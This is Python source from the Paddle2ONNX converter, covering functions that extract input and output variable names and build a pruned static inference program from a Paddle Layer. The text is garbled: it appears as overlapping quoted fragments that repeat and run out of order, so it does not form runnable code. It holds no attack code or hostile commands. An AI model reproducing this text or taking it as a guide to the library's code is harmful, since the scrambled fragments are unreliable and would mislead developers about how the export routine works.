op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please", "should be None, but received the type of 'input_spec' is %s.\" % type(input_spec))", "jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor", "var.name) else: for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error", "= output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names =", "for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program", "of Variable.\") main_program = _get_valid_program(main_program) # remind user to set auc_states to zeros", "language governing permissions and # limitations under the License. from __future__ import absolute_import", "# the rule is like [ Get input variables name ]. For output", "'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer", "= True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) >", "paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is", "need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program", "use this file except in compliance with the License. # You may obtain", "# as original input_spec here. 
if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward =", "user to set auc_states to zeros if the program contains auc op all_ops", "six import paddle from paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from", "attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there", "isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise ValueError( \"If there are static functions", "= [var.name for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block", "pass else: # prune for spec in input_spec: if spec.name is None: #", "Variable) ] if input_spec is None: # no prune return input_var_names else: #", "input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in", "= core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that you", "main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program = main_program._inference_optimize(prune_read_op=True) fetch_var_names = [v.name for v in target_vars]", "to zeros before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = []", "if spec.name is None: # name is None, the input_spec only can be", "input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ] if", "warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune for spec", "input_spec is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None)", "Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0", "= concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment:", "]. For output var, # we only support VarBase spec, and actually, we", "raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the input_spec can", "None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction)", "in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec(", "layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter,", "\"The tensor `%s` does not exists. \" \\ \"Please make sure the name", "InputSpec or example Tensor \" \\ \"in input_spec is the same as the", "should be 'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer,", "%s.\" % type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer", "make sure the name of InputSpec or example Tensor \" \\ \"in input_spec", "here. 
if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward, input_spec=inner_input_spec) concrete_program", "functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec)", "is the same as the name of InputSpec in \" \\ \"`to_static` decorated", "input_spec, # avoid needless warning inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs,", "!= attr_func: raise ValueError( \"If there are static functions other than 'forward' that", "input variables name ]. For output var, # we only support VarBase spec,", "[] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type", "in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program,", "\"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer,", "for var in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name)", "output_spec is None: result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec)", "else: inner_layer = layer # avoid change user given input_spec inner_input_spec = None", "output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone()", "_get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment =", "Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for", "target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name): main_program.global_block().create_var( name=target_v.name, shape=target_v.shape, dtype=target_v.dtype, persistable=target_v.persistable)", "'forward' != attr_func: raise ValueError( \"If there are static functions other than 'forward'", "(list, tuple)): raise TypeError( \"The input input_spec should be 'list', but received input_spec's", "of 'input_spec' is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError(", "for var in target_vars] origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block()", "input_spec=inner_input_spec) concrete_program = static_forward.concrete_program # the input_spec has been used in declarative, which", "infos. input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec) ]", "WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
# See the", "%s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec):", "use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars = output_vars main_program", "no prune result_list = input_var_names # if input spec name not in input_var_names,", "we only support VarBase spec, and actually, we only need the # var", "import Layer from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers", "result_list = input_var_names # if input spec name not in input_var_names, only raise", "paddle.fluid.io import _get_valid_program from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as", "raise TypeError( \"The input of paddle2onnx should be 'Layer', but received input type", "paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work", "== 'auc': warnings.warn( \"please ensure that you have set the auc states to", "user given input_spec inner_input_spec = None if input_spec is not None: for attr_func", "None, but received the type of 'input_spec' is %s.\" % type(input_spec)) if not", "the same as the name of InputSpec in \" \\ \"`to_static` decorated on", "len(input_spec) == len(input_var_names): # no prune result_list = input_var_names # if input spec", "isinstance(input_spec, (list, tuple)): raise TypeError( \"The input input_spec should be 'list', but received", "# # Unless required by applicable law or agreed to in writing, software", "spec infos. input_spec = [ spec for spec in input_spec if isinstance(spec, paddle.static.InputSpec)", "numpy as np import inspect import six import paddle from paddle.fluid.io import _get_valid_program", "under the Apache License, Version 2.0 (the \"License\" # you may not use", "they are consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\", "input_var_names else: # fileter out non-tensor type spec infos. input_spec = [ spec", "attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction): concrete_program =", "[feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0: # TODO(paddle-dev): polish these code blocks", "express or implied. 
# See the License for the specific language governing permissions", "== len(input_var_names): # no prune result_list = input_var_names # if input spec name", "== \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush()", "tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for", "OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec", "for var in target_vars)): raise ValueError(\"'target_vars' should be a list of Variable.\") main_program", "don't recommended to use output_spec output_vars = _get_output_vars(concrete_program.outputs, output_spec) feeded_var_names = input_var_names target_vars", "paddle.fluid import core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework", "type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer # avoid", "= None if input_spec is not None: for attr_func in dir(inner_layer): static_func =", "these code blocks if not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in", "\\ \"When using jit.save, please set InputSepc's name in \" \\ \"to_static(input_spec=[]) and", "inner_input_spec is list[InputSpec], it should be packed with same structure # as original", "either express or implied. # See the License for the specific language governing", "= layer._layers else: inner_layer = layer # avoid change user given input_spec inner_input_spec", "import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec): name_none_error = \"The", "be a list of Variable.\") main_program = _get_valid_program(main_program) # remind user to set", "limitations under the License. from __future__ import absolute_import import os import numpy as", "False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input of paddle2onnx should", "Tensor \" \\ \"in input_spec is the same as the name of InputSpec", "on the Layer.forward method.\" result_list = [] input_var_names = [ var.name for var", "name not in input_var_names, only raise warning for spec in input_spec: if spec.name", "rule is like [ Get input variables name ]. For output var, #", "\" \\ \"in input_spec is the same as the name of InputSpec in", "Variable): output_vars_dict[var.name] = var if output_spec is None: result_list = output_vars_dict.values() elif output_spec", "# no prune return input_var_names else: # fileter out non-tensor type spec infos.", "an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either", "== attr_func: # transform in jit.save, if input_spec is incomplete, declarative will throw", "_get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] # the rule is", "Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure", "attr_func: # transform in jit.save, if input_spec is incomplete, declarative will throw error", "name is None. 
\" \\ \"When using jit.save, please set InputSepc's name in", "all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list", "is %s.\" % type(input_spec)) if not isinstance(input_spec, (list, tuple)): raise TypeError( \"The input", "@declarative with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec =", "pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative", "the specific language governing permissions and # limitations under the License. from __future__", "else: result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator =", "is None: result_list = output_vars_dict.values() elif output_spec is not None and len(output_spec) ==", "spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else:", "not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name", "elif spec.name not in input_var_names: # the input_spec can be `InputSpec` or `VarBase`", "# transform in jit.save, if input_spec is incomplete, declarative will throw error #", "'input_spec' should be None, but received the type of 'input_spec' is %s.\" %", "import core from paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import", "be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: # the", "output variables ] # the rule is like [ Get input variables name", "raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable): target_vars =", "(bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars' should be a", "or example Tensor \" \\ \"in input_spec is the same as the name", "be 'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = []", "[] output_vars_dict = OrderedDict() for var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] =", "in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not", "if isinstance(static_func, StaticFunction): concrete_program = static_func.concrete_program_specify_input_spec( inner_input_spec) elif 'forward' == attr_func: # transform", "# remind user to set auc_states to zeros if the program contains auc", "the License. # You may obtain a copy of the License at #", "of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict = OrderedDict() for var", "% spec) elif spec.name not in input_var_names: # the input_spec can be `InputSpec`", "# distributed under the License is distributed on an \"AS IS\" BASIS, #", "Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. 
inner_input_spec.append(var) extra_var_info", "result_list.append(output_vars_dict[var.name]) return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator()", "can be InputSpec raise ValueError(name_none_error % spec) elif spec.name not in input_var_names: #", "Tensor \" \\ \"in configs.output_spec is the output tensor of \" \\ \"Layer.forward", "the program contains auc op all_ops = main_program.global_block().ops for op in all_ops: #", "is distributed on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF", "sure the name of InputSpec or example Tensor \" \\ \"in input_spec is", "= main_program.global_block().ops for op in all_ops: # clear device of Op device_attr_name =", "contains auc op all_ops = main_program.global_block().ops for op in all_ops: # clear device", "== \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names,", "= dict() functions = dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func,", "auc op all_ops = main_program.global_block().ops for op in all_ops: # clear device of", "paddle2onnx should be 'Layer', but received input type is %s.\" % type(layer)) if", "if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and all(isinstance(var,", "= main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i,", "\"Please make sure the name of InputSpec or example Tensor \" \\ \"in", "static_forward.concrete_program # the input_spec has been used in declarative, which is equal to", "name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make sure", "None: # no prune return input_var_names else: # fileter out non-tensor type spec", "output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not in", "from paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer", "prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" )", "input_var_names: warnings.warn(name_no_exists_error % spec.name) else: # do nothing pass else: # prune for", "inner_input_spec = None else: continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get", "variables ] # the rule is like [ Get input variables name ].", "of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list =", "in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not in", "name of example Tensor \" \\ \"in configs.output_spec is the output tensor of", "when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The", "\"in input_spec is the same as the name of InputSpec in \" \\", "inner_input_spec = None if input_spec is not None: for attr_func in dir(inner_layer): static_func", "main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for i, op", "should be packed with same structure # as original input_spec here. 
if inner_input_spec:", "result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not", "in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names", "# name is None, the input_spec only can be InputSpec raise ValueError(name_none_error %", "from paddle.fluid.dygraph.dygraph_to_static.program_translator import ProgramTranslator, StaticFunction from paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import", "the output tensor of \" \\ \"Layer.forward method.\" result_list = [] output_vars_dict =", "return result_list @dygraph.base.switch_to_static_graph def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if", "NOTE(Aurelius84): Support non-Tensor type in `input_spec`. inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer)", "for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is None: #", "with the License. # You may obtain a copy of the License at", "original input_spec here. if inner_input_spec: inner_input_spec = pack_sequence_as(input_spec, inner_input_spec) static_forward = declarative( inner_layer.forward,", "input_var_names target_vars = output_vars main_program = concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types):", "NOTE(chenweihang): [ Get output variables ] # the rule is like [ Get", "doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise", "is not None: for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if", "inner_input_spec) elif 'forward' == attr_func: # transform in jit.save, if input_spec is incomplete,", "if isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list =", "= static_forward.concrete_program # the input_spec has been used in declarative, which is equal", "input_spec is None: # no prune return input_var_names else: # fileter out non-tensor", "\\ \"Please make sure the name of InputSpec or example Tensor \" \\", "import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import", "declarative will throw error # inner_input_spec is list[InputSpec], it should be packed with", "input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec = None else:", "def get_program(layer, input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise", "var in flatten(outputs): if isinstance(var, Variable): output_vars_dict[var.name] = var if output_spec is None:", "type in `input_spec`. 
inner_input_spec.append(var) extra_var_info = dict() functions = dir(inner_layer) for attr_func in", "zeros if the program contains auc op all_ops = main_program.global_block().ops for op in", "= [v.name for v in target_vars] for target_v in target_vars: if not main_program.global_block().has_var(target_v.name):", "\\ \"and make sure they are consistent.\" name_no_exists_error = \"The tensor `%s` does", "input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name)", "of example Tensor \" \\ \"in configs.output_spec is the output tensor of \"", "isinstance(spec, paddle.static.InputSpec) ] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names", "dtype=target_v.dtype, persistable=target_v.persistable) prepend_feed_ops(main_program, feeded_var_names) append_fetch_ops(main_program, fetch_var_names) main_program.desc._set_version() paddle.fluid.core.save_op_version_info(main_program.desc) main_program._copy_dist_param_info_from(origin_program) return main_program, feeded_var_names, target_vars", "[] for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor,", "and actually, we only need the # var name of output, and we", "prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The Paddle2onnx doesn't work when", "License. from __future__ import absolute_import import os import numpy as np import inspect", "paddle.fluid import layers from paddle.nn import Layer from paddle.fluid.framework import Block, ParamBase, Program,", "[ var.name for var in flatten(inputs) if isinstance(var, Variable) ] if input_spec is", "] if len(input_spec) == len(input_var_names): # no prune result_list = input_var_names # if", "with input_spec and jit.save without input_spec, # avoid needless warning inner_input_spec = None", "the input_spec can be `InputSpec` or `VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name)", "exists. \" \\ \"Please make sure the name of example Tensor \" \\", "in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of str.\") if isinstance(target_vars, Variable):", "device of Op device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn(", "isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a list of", "law or agreed to in writing, software # distributed under the License is", "origin_program = main_program.clone() main_program = main_program.clone() global_block = main_program.global_block() need_to_remove_op_index = [] for", "[ Get input variables name ]. 
For output var, # we only support", "the License for the specific language governing permissions and # limitations under the", "for var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)):", "is %s.\" % type(input_spec)) inner_input_spec = [] for var in flatten(input_spec): if isinstance(var,", "need_to_remove_op_index = [] for i, op in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\"", "'forward' == attr_func: # transform in jit.save, if input_spec is incomplete, declarative will", "flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from paddle.fluid.dygraph.jit import", "which is equal to # @declarative with input_spec and jit.save without input_spec, #", "else: # prune for spec in input_spec: if spec.name is None: # name", "spec.name not in input_var_names: # the input_spec can be `InputSpec` or `VarBase` raise", "and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should be a", "in enumerate(global_block.ops): op.desc.set_is_target(False) if op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for", "on an \"AS IS\" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,", "static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and 'forward' != attr_func: raise", "input_var_names, only raise warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error", "program_guard(main_program): uniq_target_vars = [] for i, var in enumerate(target_vars): uniq_target_vars.append(var) target_vars = uniq_target_vars", "consistent.\" name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please make", "len(output_vars_dict): result_list = output_vars_dict.values() for var in output_spec: if var.name not in output_vars_dict:", "Paddle2onnx doesn't work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer):", "before saving inference model\" ) break with program_guard(main_program): uniq_target_vars = [] for i,", "elif 'forward' == attr_func: # transform in jit.save, if input_spec is incomplete, declarative", "in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var))", "def _get_input_var_names(inputs, input_spec): name_none_error = \"The %s's name is None. \" \\ \"When", "packed with same structure # as original input_spec here. 
if inner_input_spec: inner_input_spec =", "static functions other than 'forward' that need to be saved, the input 'input_spec'", "Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import", "_get_valid_program(main_program) # remind user to set auc_states to zeros if the program contains", "flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else:", "warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if var.name not in output_vars_dict:", "not (bool(feeded_var_names) and all( isinstance(name, six.string_types) for name in feeded_var_names)): raise ValueError(\"'feed_var_names' should", "warnings.warn(name_none_error % spec) elif spec.name not in input_var_names: warnings.warn(name_no_exists_error % spec.name) else: #", "variables name ]. For output var, # we only support VarBase spec, and", "raise warning for spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec)", "avoid change user given input_spec inner_input_spec = None if input_spec is not None:", "has been used in declarative, which is equal to # @declarative with input_spec", "return input_var_names else: # fileter out non-tensor type spec infos. input_spec = [", "\"`to_static` decorated on the Layer.forward method.\" result_list = [] input_var_names = [ var.name", "declarative, which is equal to # @declarative with input_spec and jit.save without input_spec,", "% type(layer)) if isinstance(layer, paddle.DataParallel): inner_layer = layer._layers else: inner_layer = layer #", "in compliance with the License. # You may obtain a copy of the", "License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or", "work when setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError(", "_get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \" \\ \"Please", "# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #", "setting ProgramTranslator.enable to False.\" ) if not isinstance(layer, Layer): raise TypeError( \"The input", "at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed", "for attr_func in dir(inner_layer): static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction) and", "concrete_program = static_forward.concrete_program # the input_spec has been used in declarative, which is", "op.type == \"feed\" or op.type == \"fetch\": need_to_remove_op_index.append(i) for index in need_to_remove_op_index[::-1]: global_block._remove_op(index)", "spec in input_spec: if spec.name is None: warnings.warn(name_none_error % spec) elif spec.name not", "paddle.fluid.framework import Block, ParamBase, Program, Variable, Parameter, program_guard from paddle.fluid.dygraph.layers import Layer from", "core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`. 
inner_input_spec.append(var)", "if input_spec is None: # no prune return input_var_names else: # fileter out", "See the License for the specific language governing permissions and # limitations under", "`VarBase` raise ValueError(name_no_exists_error % spec.name) else: result_list.append(spec.name) return result_list def _get_output_vars(outputs, output_spec): name_no_exists_error", "concrete_program.main_program.clone() export_for_deployment = True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if", "\" \\ \"to_static(input_spec=[]) and jit.save(input_spec=[]) \" \\ \"and make sure they are consistent.\"", "BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.", "and 'forward' != attr_func: raise ValueError( \"If there are static functions other than", "output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values() for var", "paddle.fluid.layers.utils import flatten, pack_sequence_as from collections import OrderedDict from paddle.fluid import dygraph from", "is None, the input_spec only can be InputSpec raise ValueError(name_none_error % spec) elif", "Licensed under the Apache License, Version 2.0 (the \"License\" # you may not", "the name of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\"", "raise ValueError( \"If there are static functions other than 'forward' that need to", "a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required", "0: # TODO(paddle-dev): polish these code blocks if not (bool(feeded_var_names) and all( isinstance(name,", "set the auc states to zeros before saving inference model\" ) break with", "str.\") if isinstance(target_vars, Variable): target_vars = [target_vars] elif export_for_deployment: if not (bool(target_vars) and", "dygraph from paddle.fluid.dygraph.jit import declarative from paddle.fluid import core from paddle.fluid import layers", "True if isinstance(feeded_var_names, six.string_types): feeded_var_names = [feeded_var_names] elif export_for_deployment: if len(feeded_var_names) > 0:", "name is None, the input_spec only can be InputSpec raise ValueError(name_none_error % spec)", "# http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in", "export_for_deployment: if not (bool(target_vars) and all(isinstance(var, Variable) for var in target_vars)): raise ValueError(\"'target_vars'", "Layer from paddle2onnx.utils import logging from paddle2onnx.graph.graph_helper import prepend_feed_ops, append_fetch_ops def _get_input_var_names(inputs, input_spec):", "(core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append( paddle.static.InputSpec.from_tensor(var)) else: # NOTE(Aurelius84): Support non-Tensor type in `input_spec`.", "nothing pass else: # prune for spec in input_spec: if spec.name is None:", "dir(inner_layer) for attr_func in functions: static_func = getattr(inner_layer, attr_func, None) if isinstance(static_func, StaticFunction):", "not exists. \" \\ \"Please make sure the name of InputSpec or example", "output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list = output_vars_dict.values()", "only support VarBase spec, and actually, we only need the # var name", "be saved, the input 'input_spec' should be None, but received the type of", "= \"The %s's name is None. \" \\ \"When using jit.save, please set", "the License. 
from __future__ import absolute_import import os import numpy as np import", "spec.name is None: # name is None, the input_spec only can be InputSpec", "in output_spec: if var.name not in output_vars_dict: raise ValueError(name_no_exists_error % var.name) else: result_list.append(output_vars_dict[var.name])", "result_list def _get_output_vars(outputs, output_spec): name_no_exists_error = \"The tensor `%s` does not exists. \"", "= output_vars_dict.values() elif output_spec is not None and len(output_spec) == len(output_vars_dict): result_list =", "input_spec, output_spec, **configs): paddle.jit.set_verbosity(0) prog_translator = ProgramTranslator() if not prog_translator.enable_to_static: raise RuntimeError( \"The", "are static functions other than 'forward' that need to be saved, the input", "continue input_var_names = _get_input_var_names(concrete_program.inputs, inner_input_spec) # NOTE(chenweihang): [ Get output variables ] #", "for index in need_to_remove_op_index[::-1]: global_block._remove_op(index) main_program.desc.flush() main_program = main_program._prune_with_input( feeded_var_names=feeded_var_names, targets=target_vars) main_program =", "prune result_list = input_var_names # if input spec name not in input_var_names, only", "device_attr_name = core.op_proto_and_checker_maker.kOpDeviceAttrName() op._set_attr(device_attr_name, \"\") if op.type == 'auc': warnings.warn( \"please ensure that", "be 'Layer', but received input type is %s.\" % type(layer)) if isinstance(layer, paddle.DataParallel):", "'list', but received input_spec's type is %s.\" % type(input_spec)) inner_input_spec = [] for", "name of InputSpec in \" \\ \"`to_static` decorated on the Layer.forward method.\" result_list", "from paddle.fluid import core from paddle.fluid import layers from paddle.nn import Layer from", "spec) elif spec.name not in input_var_names: # the input_spec can be `InputSpec` or", "var.name not in output_vars_dict: warnings.warn(name_no_exists_error % var.name) else: for var in output_spec: if", "= \"The tensor `%s` does not exists. \" \\ \"Please make sure the", "var in flatten(input_spec): if isinstance(var, paddle.static.InputSpec): inner_input_spec.append(var) elif isinstance(var, (core.VarBase, core.eager.Tensor, Variable)): inner_input_spec.append(", "import numpy as np import inspect import six import paddle from paddle.fluid.io import", "= dir(inner_layer) for attr_func in functions: static_func = 